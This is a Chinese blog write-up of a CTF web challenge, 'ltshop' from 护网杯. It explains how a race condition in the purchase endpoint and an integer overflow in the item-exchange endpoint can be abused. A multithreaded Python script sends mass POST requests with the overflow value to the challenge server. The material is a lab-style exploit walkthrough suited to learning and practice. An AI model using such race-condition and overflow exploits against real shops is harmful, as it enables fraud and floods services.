护网杯ltshop writeup

漏洞分析 master 11个月前 (10-13) 3186次浏览 已收录 0个评论 扫描二维码

首先看一下题目首页,常规检查一遍,什么都没有

然后注册用户,登录查看一番

护网杯ltshop writeup

经过一番测试,发现购买大辣条的地方存在一点点的条件竞争,可以购买到5包或以上的辣条

用burp抓包,发送到intruder模块直接多线程跑即可得到

 

护网杯ltshop writeup

成功购买到5包以上辣条,然后在兑换辣条之王的位置进行整数溢出

测试结果是0xffff ffff ffff ffff转十进制后,先除以5然后再加1

这里的后端逻辑可能是5包大辣条换一包辣条之王,然后提交x份,那么就需要5x包辣条,但是因为MySQL的限制,超出0xffff ffff ffff ffff后就会报错,所以要除以5,然后加1进行溢出

护网杯ltshop writeup

成功进行溢出,到info页面确认一下是否得到了足够的辣条之王

护网杯ltshop writeup

此时就可以购买flag

更新一个来自基友的py脚本

#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: liang 
import json
import requests
import time
from concurrent.futures import ThreadPoolExecutor

def echke():
    headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99',
            'Cookie': 'go_iris_cookie=f9b8119f-5255-4e10-b13d-6b21c136aa66',
    }
    data={'number':'3689348814741910324'}
    url='http://49.4.79.1:32228/buylt'
    ret=requests.post(url=url,headers=headers,data=data)
    print(ret.text)


thread = 1000
try:
    with ThreadPoolExecutor(thread) as exector:
        for i in range(1,5000000000000000000):
            response = exector.submit(echke,)
            if  response:
                pass
            else:
                print(response)
except Exception as e:
    try:
        with ThreadPoolExecutor(thread) as exector:
            for i in range(1, 5000000000000000000):
                response = exector.submit(echke, )
                if response:
                    pass
                else:
                    print(response)
    except Exception as e:
        with ThreadPoolExecutor(thread) as exector:
            for i in range(1, 5000000000000000000):
                response = exector.submit(echke, )
                if response:
                    pass
                else:
                    print(response)
文件下载
恭喜,此资源为免费资源,请先
联系邮箱:mymortals@gmail.com

Xss.lc私人博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:护网杯ltshop writeup
喜欢 (1)
master
关于作者:
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址